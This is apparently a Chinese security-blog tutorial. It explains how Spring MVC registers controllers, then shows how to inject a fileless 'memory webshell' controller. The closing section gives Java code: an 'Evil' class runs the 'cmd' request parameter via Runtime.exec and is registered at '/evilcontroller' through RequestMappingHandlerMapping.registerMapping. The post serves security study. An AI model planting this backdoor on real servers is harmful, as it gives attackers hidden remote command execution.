内存马第三弹——Controller内存马

2024-09-20 63 0

Spring Controller

什么是Spring Controller

Spring Controller 是 Spring MVC(Spring Model-View-Controller)框架中的一个核心组件,是用户请求和业务逻辑之间的桥梁。Spring Controller 负责处理由DispatcherServlet分发的请求,执行相应的业务逻辑, 将数据传递给视图层,以生成最终的响应。 。

在Spring MVC中,Controller 可以通过多种方式实现,最常见的方式是通过在类上添加@Controller,Spring会自动检测并注册这个类为一个Controller。然后,你可以在该类中定义多个方法来处理不同的请求,每个方法上都会使用如@RequestMapping、@GetMapping、@PostMapping等注解来指定该方法处理的请求类型、URL路径等信息。

创建用例

创建一个Spring MVC的项目

创建Controller

@Controller
public class UerController {

    @RequestMapping("/quick")
    public String quick() {
        // 业务逻辑
        System.out.println("quick running......");
        // 视图跳转
        return "/WEB-INF/pages/success.jsp";
    }
}

启tomcat并成功跳转到classpath/WEB-INF/templates/success.jsp

项目创建参考:https://blog.csdn.net/u012660464/article/details/120116683
内存马第三弹——Controller内存马插图

Spring Controller注册流程

1、识别Controller

Spring容器扫描应用程序中的所有类,判断是否有被@Controller注解标记。如果有识别出带有@Controller的类,将其注册为Bean。

2、创建请求映射

在Controller被注册为Bean之后,Spring MVC会进一步处理这些Controller中的方法,通常是解析方法上的@RequestMapping、@GetMapping、@PostMapping等注解。这些注解指定了方法处理的请求类型(如GET、POST)、URL路径、请求参数等信息。探测到处理器方法后,还需要建立请求URL与处理器方法之间的映射关系,这个关系通常被存储在RequestMappingHandlerMapping的内部数据结构中。

3、处理请求

当DispatcherServlet接收到一个HTTP请求时,它会根据请求的URL和HTTP方法来查找HandlerMapping中注册的映射关系,找到对应的Controller方法。然后,它会使用反射调用该方法来处理请求,并接收返回的视图名称或数据。最后,DispatcherServlet会使用视图解析器(ViewResolver)来解析视图名称并渲染视图,或者直接将数据写回给客户端。

源码分析

Controller的注册

SpringMVC内部将Controller的方法抽象为多个org.springframework.web.method.HandlerMethod,将Method的@RequestMapping注解抽象成org.springframework.web.servlet.mvc.method.RequestMappingInfo。所以我们从initHandlerMethods()开始。主要是从当前上下文(ApplicationContext)获取所有bean name,然后进入processCandidateBean()根据注解修饰进一步处理。

在这之前是实例化了一个bean,然后开始初始化bean。

protected void initHandlerMethods() {
    String[] var1 = this.getCandidateBeanNames();
    //获取Spring容器中所有bean
    int var2 = var1.length;

    for(int var3 = 0; var3 < var2; ++var3) {
        //遍历所有bean,在for循环中添加映射
        String beanName = var1[var3];
        if (!beanName.startsWith("scopedTarget.")) {
            this.processCandidateBean(beanName);
        }    }

protected void processCandidateBean(String beanName) {
    Class<?> beanType = null;

    try {
        beanType = this.obtainApplicationContext().getType(beanName);
        //获取指定beanName的Bean class
    } catch (Throwable var4) {
        if (this.logger.isTraceEnabled()) {
            this.logger.trace("Could not resolve type for bean '" + beanName + "'", var4);
        }
    }

    if (beanType != null && this.isHandler(beanType)) {
        //如果类被@Controller注解或被@RequestMapping注解
         this.detectHandlerMethods(beanName);
    }

}

protected boolean isHandler(Class<?> beanType) {
    return AnnotatedElementUtils.hasAnnotation(beanType, Controller.class) || AnnotatedElementUtils.hasAnnotation(beanType, RequestMapping.class);
    //检查传入的类的class对象是否被@Controller注解标记或者被@RequestMapping注解
}

进入detectHandlerMethods(),主要是根据@RequestMapping从类中获取映射方法以及mapping,再通过registerHandlerMethod()将其注册到MappingRegistry。

protected void detectHandlerMethods(Object handler) {
    Class<?> handlerType = handler instanceof String ? this.obtainApplicationContext().getType((String)handler) : handler.getClass();
    //判断handler是否是String,如果是,通过this.obtainApplicationContext().getType((String)handler)获取这个字符串对应的类型
    if (handlerType != null) {
        Class<?> userType = ClassUtils.getUserClass(handlerType);
        //通过判断类名是否包含'$$',处理与动态代理相关的场景。确保获取被代理的原始类,而不是代理类本身。
        Map<Method, T> methods = MethodIntrospector.selectMethods(userType, (method) -> {
        //获取到bean的所有方法,然后遍历
            try {
                return this.getMappingForMethod(method, userType);
                //这里是将Lambda表达式作为第二个参数传入selectMethods,即selectMethods会在内部调用,并对method、userType赋值
            } catch (Throwable var4) {
                throw new IllegalStateException("Invalid mapping on handler class [" + userType.getName() + "]: " + method, var4);
            }
        });
        if (this.logger.isTraceEnabled()) {
            this.logger.trace(this.formatMappings(userType, methods));
        }

        methods.forEach((method, mapping) -> {
            //遍历所有方法并调用registerHandlerMethod注册
            Method invocableMethod = AopUtils.selectInvocableMethod(method, userType);
            this.registerHandlerMethod(handler, invocableMethod, mapping);
        });
    }

}

protected RequestMappingInfo getMappingForMethod(Method method, Class<?> handlerType) {
    RequestMappingInfo info = this.createRequestMappingInfo(method);
    if (info != null) {
        RequestMappingInfo typeInfo = this.createRequestMappingInfo(handlerType);
        if (typeInfo != null) {
            info = typeInfo.combine(info);
            //合并类和方法的两个mapping
        }

        String prefix = this.getPathPrefix(handlerType);
        if (prefix != null) {
            info = RequestMappingInfo.paths(new String[]{prefix}).build().combine(info);
        }
    }

    return info;
    //返回一个RequestMappingInfo类对象
}

调用AbstractHandlerMethodMapping#register方法注册控制器中的方法,以及其与URL之间的映射关系,最后所有信息都会封装到MappingRegistry中。

protected void registerHandlerMethod(Object handler, Method method, T mapping) {
    this.mappingRegistry.register(mapping, handler, method);
    //mapping表示请求映射信息;handler表示处理器对象;method表示处理器方法
}

public void register(T mapping, Object handler, Method method) {
    this.readWriteLock.writeLock().lock();
    //确保当前线程独占访问,防止并发问题
    try {
        HandlerMethod handlerMethod = AbstractHandlerMethodMapping.this.createHandlerMethod(handler, method);
        //创建HandlerMethod对象,里面封装了handler和method
        this.assertUniqueMethodMapping(handlerMethod, mapping);
        //检查mapping对应的handlerMethod 是唯一的
        this.mappingLookup.put(mapping, handlerMethod);
        //存储mapping和handlerMethod的映射关系
        List<String> directUrls = this.getDirectUrls(mapping);
        Iterator var6 = directUrls.iterator();

        while(var6.hasNext()) {
            String url = (String)var6.next();
            this.urlLookup.add(url, mapping);
        }

        String name = null;
        if (AbstractHandlerMethodMapping.this.getNamingStrategy() != null) {
            name = AbstractHandlerMethodMapping.this.getNamingStrategy().getName(handlerMethod, mapping);
            this.addMappingName(name, handlerMethod);
        }

        CorsConfiguration corsConfig = AbstractHandlerMethodMapping.this.initCorsConfiguration(handler, method, mapping);
        if (corsConfig != null) {
            this.corsLookup.put(handlerMethod, corsConfig);
        }

        this.registry.put(mapping, new MappingRegistration(mapping, handlerMethod, directUrls, name));
        //将mapping、handlerMethod、directUrls、name等信息封装成MappingRegistration对象,并存储到registry
    } finally {
        this.readWriteLock.writeLock().unlock();
        //解锁
    }

}

以上就基本完成了controller包含方法的注册

Controller的请求处理

内存马分析

根据上面的流程显示,可以调用AbstractHandlerMethodMapping#register方法来注册恶意Controller

1、创建恶意类,可以通过cmd传参执行命令。

public class Evil {
    public void cmd(){
        HttpServletRequest request = ((ServletRequestAttributes) (RequestContextHolder.currentRequestAttributes())).getRequest();

        HttpServletResponse response = ((ServletRequestAttributes) (RequestContextHolder.currentRequestAttributes())).getResponse();
        String command=request.getParameter("cmd");

        if (command!=null){
            try {
                Runtime.getRuntime().exec(command);
            } catch (IOException e) {
                throw new RuntimeException(e);
            }
        }else {
            return;
        }
    }
}

2、获取RequestMappingHandlerMapping 对象。

WebApplicationContext context = (WebApplicationContext) RequestContextHolder.currentRequestAttributes().getAttribute("org.springframework.web.servlet.DispatcherServlet.CONTEXT", 0);
RequestMappingHandlerMapping requestMappingHandlerMapping = context.getBean(RequestMappingHandlerMapping.class);

3、获取参数:Object handler, Method method, T mapping

Method method = InjectedController.class.getMethod("cmd");
PatternsRequestCondition url = new PatternsRequestCondition("/evilcontroller");
RequestMethodsRequestCondition condition = new RequestMethodsRequestCondition();
RequestMappingInfo info = new RequestMappingInfo(url, condition, null, null, null, null, null);
InjectedController injectedController = new InjectedController();

4、调用register方法,这里的registerMapping最终也会调用register方法,实现Controller的注册。

requestMappingHandlerMapping.registerMapping(info, injectedController, method);

内存马第三弹——Controller内存马插图1


4A评测 - 免责申明

本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。

不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。

本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。

如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!

程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。

侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)

相关文章

webpack打包站点,js文件名批量获取思路
加密对抗靶场enctypt——labs通关
【论文速读】| 注意力是实现基于大语言模型的代码漏洞定位的关键
蓝队技术——Sysmon识别检测宏病毒
内网渗透学习|powershell上线cs
LLM attack中的API调用安全问题及靶场实践

发布评论